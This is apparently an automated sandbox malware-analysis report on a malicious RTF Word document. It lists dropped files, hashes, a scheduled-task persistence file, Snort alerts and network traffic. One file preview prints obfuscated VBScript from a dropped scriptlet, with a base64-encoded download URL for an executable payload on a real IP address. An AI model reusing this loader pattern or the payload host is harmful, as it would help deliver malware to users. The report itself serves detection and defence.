                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):171404
                                          Entropy (8bit):4.423261254047836
                                          Encrypted:false
                                          SSDEEP:384:pAayMzzacasapa2hb04gQmU38Nl6UnRJbtqEEE6oEaE35n0:2azzacasapa2G4gQ538Nl6Un7ZFPW1p0
                                          MD5:8E17238688D177980DF980776169FCF2
                                          SHA1:C43A0581DDD877CDC5D066067A7489497DB8B282
                                          SHA-256:3B3E99D32E8913D3BDC94907F3FC39D08A8396B9AA15D982B55024327F598B92
                                          SHA-512:5AE07477E79BB29F11BEA579A13C2F0C3327E069039A6CDECD3FEF23D6E8E7803DA32842D0C69CCF6B2280787AEBFC92AB905104637696EE144ED84999ED678E
                                          Malicious:true
                                          Preview: Radio. U+262D Radioactive Sign U+2622 .active Sign U+2622 .. . U+262D Radioactive Sig..<scriptleT.. >. . U+262D Radioactive Sign U+2622 .U+262D Radio. U+262D Radioactive Sign U+2622 .active Sign U+2622 .... . U+262D Radioactive Sign U+2622 .U+262D Radio. U+262D Radioactive Sign U+2622 .active Sign U+2622 ...<script language = 'vbs'>..fsdfdsfs = "aHR0UDovLzEzLjkyLjEwMC4yMDgvZG9jL2RvYy5leGU=" '9vnw9r..yulkytjtrhtjrkdsarjky ="ZG9jLmV4ZQ==" '9vnw9r....veuifeig23e02i3r029u4r43j89uotjf893jt = "2432423*23453567/2289574543+3458689324723*2785634875436/25675476247-27687567-96765763-35676486484+3689356348756347856"..veuifeig23e02i3r029u4r43j89uotjf893jt = "2432423*23453567/2289574543+3458689324723*2785634875436/25675476247-27687567-96765763-35676486484+3689356348756347856"..veuifeig23e02i3r029u4r43j89uotjf893jt = "2432423*23453567/2289574543+3458689324723*2785634875436/25675476247-27687567-96765763-35676486484+3689356348756347856"..veuifeig23e02i3r
                                          C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT:Zone.Identifier
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):27
                                          Entropy (8bit):3.9582291686698787
                                          Encrypted:false
                                          SSDEEP:3:gAWY3W:qY3W
                                          MD5:833C0EFD3064048FD6A71565CA115CCD
                                          SHA1:0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
                                          SHA-256:4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
                                          SHA-512:536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
                                          Malicious:false
                                          Preview: [ZoneTransfer]..ZoneId=3..3
                                          C:\Users\user\AppData\Local\Temp\tmp2C00.tmp
                                          Process:C:\Users\user\AppData\Roaming\doc.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1620
                                          Entropy (8bit):5.142495643044382
                                          Encrypted:false
                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBstn:cbhZ7ClNQi/rydbz9I3YODOLNdq3g
                                          MD5:A9DD7D1E6E9610571B7272E800118317
                                          SHA1:201D2D07ED30CD502C49FB7A7B394B3DD2AC5DA0
                                          SHA-256:CA79D29A83423D0A363CDC7E5ADDA4ABB149ED0014CB364F1E4301901FDE99D4
                                          SHA-512:68A4055A2A5BFFE421B0C3B77F3D33DAAD692AE62FB28A35E0605AA4AFD87A4D09B92256A9F2FADEA3394B8B5122B7D8853D8EA6C123FEEFD30DAEDE7E1B5EB9
                                          Malicious:true
                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\catalogue_2021_samples_list_revise_ol.LNK
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Sep 29 03:17:20 2021, length=548674, window=hide
                                          Category:dropped
                                          Size (bytes):2298
                                          Entropy (8bit):4.542840084257542
                                          Encrypted:false
                                          SSDEEP:48:8N/XTAZ+lyM638plyl5yYy52N/XTAZ+lyM638plyl5yYyX:8N/Xsf3X5yYy52N/Xsf3X5yYyX
                                          MD5:DCF53F1D846D774043C5E1AA602BE23C
                                          SHA1:42B7A998F530A33540AF200690E03ADF7203CB38
                                          SHA-256:DB5022C4C42607BAE923A9E960AD487ABEFDBE671E66B23DA166F82D1F69D5FE
                                          SHA-512:D790690D7EF647576417F0F20F9B95D65CD7F72A48CA88863553B42B5E8DF381DBDFFFAC00FFB98C4A8A14EE275605AE944511AF9D5C847F393E1BA41157C8A0
                                          Malicious:false
                                          Preview: L..................F.... ....D.?....D.?...^.,....B_...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S!...user.8......QK.X.S!.*...&=....U...............A.l.b.u.s.....z.1......S"...Desktop.d......QK.X.S".*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.B_..=S+" .CATALO~1.DOC..........S ..S .*.........................c.a.t.a.l.o.g.u.e._.2.0.2.1._.s.a.m.p.l.e.s._.l.i.s.t._.r.e.v.i.s.e._.o.l...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\catalogue_2021_samples_list_revise_ol.doc.@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.t.a.l.o.g.u.e._.2.0.2.1._.s.a.m.p.l.e.s._.l.i.s.t._.r.e.v.i.s.e._.o.l...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5
                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):149
                                          Entropy (8bit):4.533812779256457
                                          Encrypted:false
                                          SSDEEP:3:M1TR6QA8VXjUVJWCWR6X2vSd6leJrQA8VXjUVJWCWR6X2vSd6lmX1TR6QA8VXjUM:MfdUVk+G6LOdUVk+G6hdUVk+G6C
                                          MD5:63A62ECACBB279B739D76DE8BC290735
                                          SHA1:DC88C6A95984619248B35D2649A2C0CA869E3468
                                          SHA-256:95631AA3E299E5D22D89FB39BBBCFA22A3772765421821F3049BDF2A21CBD064
                                          SHA-512:2535EE7BEC9946D317F53F207699189CC05993DD42064E9C3CF6942729212BE26A1340220DCDC1F3E6151D5211BBC579D874F62E0267F80706356F72CF41FF5A
                                          Malicious:false
                                          Preview: [doc]..catalogue_2021_samples_list_revise_ol.LNK=0..catalogue_2021_samples_list_revise_ol.LNK=0..[doc]..catalogue_2021_samples_list_revise_ol.LNK=0..
                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.5038355507075254
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                          Category:dropped
                                          Size (bytes):2
                                          Entropy (8bit):1.0
                                          Encrypted:false
                                          SSDEEP:3:Qn:Qn
                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                          Malicious:false
                                          Preview: ..
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.5832864194691743
                                          Encrypted:false
                                          SSDEEP:96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
                                          MD5:7F8ED39C9E9D7119109A23D3E57D2D6D
                                          SHA1:423280C4D9C5EFB94129E31342C0201677121743
                                          SHA-256:5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
                                          SHA-512:35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms2- (copy)
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.5832864194691743
                                          Encrypted:false
                                          SSDEEP:96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
                                          MD5:7F8ED39C9E9D7119109A23D3E57D2D6D
                                          SHA1:423280C4D9C5EFB94129E31342C0201677121743
                                          SHA-256:5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
                                          SHA-512:35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msk (copy)
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.5832864194691743
                                          Encrypted:false
                                          SSDEEP:96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
                                          MD5:7F8ED39C9E9D7119109A23D3E57D2D6D
                                          SHA1:423280C4D9C5EFB94129E31342C0201677121743
                                          SHA-256:5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
                                          SHA-512:35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7T64VM0QKZYD09V16F0X.temp
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.5832864194691743
                                          Encrypted:false
                                          SSDEEP:96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
                                          MD5:7F8ED39C9E9D7119109A23D3E57D2D6D
                                          SHA1:423280C4D9C5EFB94129E31342C0201677121743
                                          SHA-256:5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
                                          SHA-512:35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AEIVZJ3XSV20N2BPRI8G.temp
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.5832864194691743
                                          Encrypted:false
                                          SSDEEP:96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
                                          MD5:7F8ED39C9E9D7119109A23D3E57D2D6D
                                          SHA1:423280C4D9C5EFB94129E31342C0201677121743
                                          SHA-256:5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
                                          SHA-512:35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KALU1MUBXB5ZLB042YQK.temp
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):8016
                                          Entropy (8bit):3.5832864194691743
                                          Encrypted:false
                                          SSDEEP:96:chQCcMqWqvsqvJCwofz8hQCcMqWqvsEHyqvJCworZzIuYzH8UVhFlUVNA2:cizofz8inHnorZzICUVhMA2
                                          MD5:7F8ED39C9E9D7119109A23D3E57D2D6D
                                          SHA1:423280C4D9C5EFB94129E31342C0201677121743
                                          SHA-256:5C7FEC2A94ACC87928903A8D5ADB135DC2F0769BBC2E6D13EACF4E7E54C289EA
                                          SHA-512:35407E957B8DDB7AF98173CBAE534731A201AAFFE23FDADC49C5E7B63D5EE36109194EB8C36B5FE1418FE8F1DAB35BCC4209DBA9D45F2B325237A3DF46A32648
                                          Malicious:false
                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                          C:\Users\user\AppData\Roaming\doc.exe
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):637440
                                          Entropy (8bit):6.333867454868441
                                          Encrypted:false
                                          SSDEEP:12288:JA9Ni+hBr7IUA4S8vxou4AqcUkhPXuFJ:i9Ni+hBr8UAcZtIQXQ
                                          MD5:D8BC91E846E3D624814D4557681F33AD
                                          SHA1:873F451438EFCE56D2BCE9DD9B44BEEFB2C6A28B
                                          SHA-256:30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
                                          SHA-512:78909D822CB9706155B77B85CF1F9A274BE7155C61EE71A49555932A11BA05311F308760B6BAED3338CFCBA6EC1647F010E5B13E25BDE839F67033CD20739A24
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 31%
                                          Joe Sandbox View:
                                          • Filename: hjFNtGCV66.exe, Detection: malicious, Browse
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ra..............0..............&... ...@....@.. ....................... ............@..................................&..O....@.. ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc..............................@..B.................&......H........@...................@...........................................0...........r...p.+..*..0...........r+..p.+..*..0..................+..*".(.....*^..}.....(.......(.....*....0.............+.s....(.......X.......-.*....0..+.........,..{.......+....,...{....o........(.....*..0..1.........s....}.....(......{.... .....3s....o .....{....rA..po!.....{.....K..s"...o#.....{.....o$.....{....rA..po%.....{.....o&....."...@"..PAs'...((......()..... J... ....s"...(*....~....rQ..p(.
                                          C:\Users\user\AppData\Roaming\maBdogbw.exe
                                          Process:C:\Users\user\AppData\Roaming\doc.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):637440
                                          Entropy (8bit):6.333867454868441
                                          Encrypted:false
                                          SSDEEP:12288:JA9Ni+hBr7IUA4S8vxou4AqcUkhPXuFJ:i9Ni+hBr8UAcZtIQXQ
                                          MD5:D8BC91E846E3D624814D4557681F33AD
                                          SHA1:873F451438EFCE56D2BCE9DD9B44BEEFB2C6A28B
                                          SHA-256:30FAB10AA23C7DBB0B66B3B0491582F2BB6930E7BCE11A078C3093AE4B40DC7E
                                          SHA-512:78909D822CB9706155B77B85CF1F9A274BE7155C61EE71A49555932A11BA05311F308760B6BAED3338CFCBA6EC1647F010E5B13E25BDE839F67033CD20739A24
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 31%
                                          Joe Sandbox View:
                                          • Filename: hjFNtGCV66.exe, Detection: malicious, Browse
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ra..............0..............&... ...@....@.. ....................... ............@..................................&..O....@.. ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc..............................@..B.................&......H........@...................@...........................................0...........r...p.+..*..0...........r+..p.+..*..0..................+..*".(.....*^..}.....(.......(.....*....0.............+.s....(.......X.......-.*....0..+.........,..{.......+....,...{....o........(.....*..0..1.........s....}.....(......{.... .....3s....o .....{....rA..po!.....{.....K..s"...o#.....{.....o$.....{....rA..po%.....{.....o&....."...@"..PAs'...((......()..... J... ....s"...(*....~....rQ..p(.
                                          C:\Users\user\Desktop\~$talogue_2021_samples_list_revise_ol.doc
                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):162
                                          Entropy (8bit):2.5038355507075254
                                          Encrypted:false
                                          SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                          MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                          SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                          SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                          SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                          Malicious:false
                                          Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                          Static File Info

                                          General

                                          File type:Rich Text Format data, unknown version
                                          Entropy (8bit):3.52997043173829
                                          TrID:
                                          • Rich Text Format (5005/1) 55.56%
                                          • Rich Text Format (4004/1) 44.44%
                                          File name:catalogue_2021_samples_list_revise_ol.doc
                                          File size:548674
                                          MD5:84c45c2b0e94b8d1d064e739150ba84c
                                          SHA1:f6a98ac4e50a89495626b5eaebb85d1116554faa
                                          SHA256:7b5572ae246bcd3f6ee0375e1e7a8c8d4287dae4ca1803d72ae427d8ecc93a32
                                          SHA512:8fb31fc4147af9e1568c9799307b3d5a8b4a3ed607e14061769f239ce4dd9b10464b9f878900c8777f1550b9a9e8cdfb7901bb22d6fa958f9761a4831ddf6162
                                          SSDEEP:12288:z////////////////////////////////////CAggMdzFHRsU0:evRsU0
                                          File Content Preview:{\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

                                          File Icon

                                          Icon Hash:e4eea2aaa4b4b4a4

                                          Static RTF Info

                                          Objects

                                          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                          000000965h2embeddedpackage171502abdtfhgXgeghDh.ScTC:\nsdsTggX\abdtfhgXGeghDh.ScTC:\CbkepaDw\abdtfhghgeghDh.ScTno
                                          100057BCCh2embeddedOLE2LInk2560no

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/28/21-21:17:36.156210TCP1560WEB-MISC /doc/ access4916780192.168.2.2213.92.100.208
                                          09/28/21-21:17:36.156210TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.2213.92.100.208
                                          09/28/21-21:17:41.511834TCP1560WEB-MISC /doc/ access4916880192.168.2.2213.92.100.208

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 28, 2021 21:17:36.053939104 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.154908895 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.155019999 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.156209946 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257023096 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257581949 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257618904 CEST804916713.92.100.208192.168.2.22
